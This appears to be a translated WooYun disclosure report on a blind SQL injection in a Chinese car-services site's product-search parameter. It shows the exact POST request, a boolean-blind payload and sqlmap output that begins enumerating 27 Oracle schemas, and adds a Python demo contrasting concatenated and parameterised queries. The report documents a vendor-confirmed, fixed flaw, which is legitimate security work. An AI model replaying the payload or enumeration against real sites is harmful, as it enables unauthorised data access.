
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0123476

Title: 车音网 SQL injection No. 4 (27 databases)

Vendor: 深圳市车音网科技有限公司

Author: 天地不仁 以万物为刍狗

Submitted: 2015-06-29 16:19

Fixed: 2015-08-13 17:50

Published: 2015-08-13 17:50

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure timeline:

2015-06-29: Details sent to the vendor, awaiting vendor handling
2015-06-29: Vendor confirmed; details disclosed to the vendor only
2015-07-09: Details disclosed to core white hats and domain experts
2015-07-19: Details disclosed to regular white hats
2015-07-29: Details disclosed to intern white hats
2015-08-13: Details disclosed to the public

Brief description:

Heaven and earth are not benevolent; they treat all things as straw dogs.
[HD] In the name of the team and for individual honor, building cybersecurity together.

Detailed description:

POST request:

POST /comm/commlistpbl?time=1435561511290 HTTP/1.1
Content-Length: 130
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://hui.vcyber.com:80/
Cookie: ASP.NET_SessionId=myimwlbtpmr1hey2dttswv55; Hm_lvt_dfe63f06e975a06d1c7bd00163a44b8d=1435561512,1435561541; Hm_lpvt_dfe63f06e975a06d1c7bd00163a44b8d=1435561541; HMACCOUNT=BF8F36E9E6A2F87A
Host: hui.vcyber.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
CommName=-1&CommTypeID=&IYN=&PageNums=1&sellPrice=&TJType=&ZCount=


The CommName parameter is not sanitized before reaching the query, which is what makes this injection possible.

[Screenshot: 0.png]


Because retrieving data through this injection point is very slow, I did not go any further.

POST parameter 'CommName' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 81 HTTP(s) requests:
---
Parameter: CommName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: CommName=-1%' AND 1404=1404 AND '%'='&CommTypeID=&IYN=&PageNums=1&sellPrice=&TJType=&ZCount=
---
[15:33:16] [INFO] testing MySQL
[15:33:16] [WARNING] the back-end DBMS is not MySQL
[15:33:16] [INFO] testing Oracle
[15:33:18] [INFO] confirming Oracle
[15:33:25] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Oracle
[15:33:25] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:33:25] [INFO] fetching database (schema) names
[15:33:25] [INFO] fetching number of databases
[15:33:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:33:25] [INFO] retrieved: 27
[15:34:21] [INFO] retrieved: A
[15:35:18] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
PEX_03020
[15:38:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
0
[15:39:24] [INFO] retrieved: APPQO
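The sqlmap output above shows why an unsanitized CommName matters: the payload closes the LIKE literal, appends a condition, and re-balances the quotes with '%'=', so the server's answer changes with the truth of the injected condition. The following is an added example, not code from the report or from 车音网; it reconstructs that flawed query pattern as a hypothetical function beside a hardened one, using SQLite and a constructed product table as a stand-in for the site's Oracle backend. The table name comm, the column CommName and the sample rows are assumptions for illustration.

```python
import sqlite3

# Constructed sample catalogue (not data from the report). SQLite stands in
# for the site's Oracle backend; the query shapes are the same.
PRODUCTS = [
    (1, "Audi A4 phone holder"),
    (2, "BMW 3 series charger"),
    (3, "Audi Q5 dash mount"),
]


def make_db():
    """Build an in-memory table shaped like a product (comm) listing."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comm (id INTEGER PRIMARY KEY, CommName TEXT)")
    conn.executemany("INSERT INTO comm (id, CommName) VALUES (?, ?)", PRODUCTS)
    return conn


def vulnerable_search(conn, comm_name):
    """Hypothetical reconstruction of the flawed pattern: the request value
    is concatenated straight into the LIKE literal, so a quote in the input
    ends the literal and whatever follows becomes SQL."""
    sql = "SELECT id FROM comm WHERE CommName LIKE '%" + comm_name + "%' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def escape_like(value):
    """Escape LIKE metacharacters so user input matches literally.
    Bind variables stop injection but do not neutralise % and _."""
    return value.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def safe_search(conn, comm_name):
    """Hardened form: the value travels as a bind variable and can only ever
    be a string, never SQL syntax (on Oracle this would be a :name bind)."""
    sql = (
        "SELECT id FROM comm WHERE CommName LIKE '%' || ? || '%' ESCAPE '\\' "
        "ORDER BY id"
    )
    return [row[0] for row in conn.execute(sql, (escape_like(comm_name),))]


def boolean_probe(search, conn, base, condition):
    """Issue a probe shaped like the report's payload: close the LIKE
    literal, splice in a condition, then re-balance quotes with '%'='."""
    return search(conn, base + "%' AND " + condition + " AND '%'='")


def demo():
    """Return what each implementation answers to a true and a false probe.
    A difference between the two answers is the blind-injection oracle."""
    conn = make_db()
    return {
        "vulnerable": (
            boolean_probe(vulnerable_search, conn, "Audi", "1=1"),
            boolean_probe(vulnerable_search, conn, "Audi", "1=2"),
        ),
        "safe": (
            boolean_probe(safe_search, conn, "Audi", "1=1"),
            boolean_probe(safe_search, conn, "Audi", "1=2"),
        ),
    }


if __name__ == "__main__":
    for name, (true_probe, false_probe) in demo().items():
        print(f"{name}: true-condition -> {true_probe}, false-condition -> {false_probe}")
```

With the concatenated query, a true condition returns the Audi rows and a false one returns nothing, which is exactly the yes/no channel sqlmap used to read the schema count and names one character at a time. With the bind variable, both probes return the same empty result because the whole input is treated as a product name to match. The ESCAPE clause is a separate defensive detail: parameterization alone still lets % and _ act as wildcards, which is a data-exposure issue rather than injection.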


Proof of vulnerability:

Remediation:

Copyright notice: when reposting, credit the source 天地不仁 以万物为刍狗@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2015-06-29 17:48

Vendor reply:

Thanks

Latest status:

None